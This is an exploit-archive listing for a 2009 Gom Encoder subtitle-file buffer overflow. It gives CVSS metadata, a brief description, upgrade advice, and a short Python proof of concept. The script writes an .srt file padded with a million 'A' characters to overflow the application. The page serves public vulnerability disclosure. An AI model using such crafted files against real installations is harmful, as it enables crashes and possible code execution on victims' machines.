header-logo
Suggest Exploit
vendor:
Gom Encoder
by:
Encrypt3d.M!nd
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Gom Encoder
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Gom Encoder (Subtitle File) Buffer Overflow PoC

A buffer overflow vulnerability exists in Gom Encoder when handling subtitle files. A specially crafted subtitle file can cause a buffer overflow, resulting in arbitrary code execution. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Gom Encoder.
Source

Exploit-DB raw data:

#exploit.py
#
# Gom Encoder (Subtitle File) Buffer Overflow PoC
# by :Encrypt3d.M!nd
#
#  Orignal Advisory:
#  https://www.securityfocus.com/bid/34120
#

chars = 'A' * 1000000

file = open ( 'devil_inside.srt', 'w' )
file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars)
file.close()

# milw0rm.com [2009-03-16]

Navigation

Suggest Exploit

Services By CQR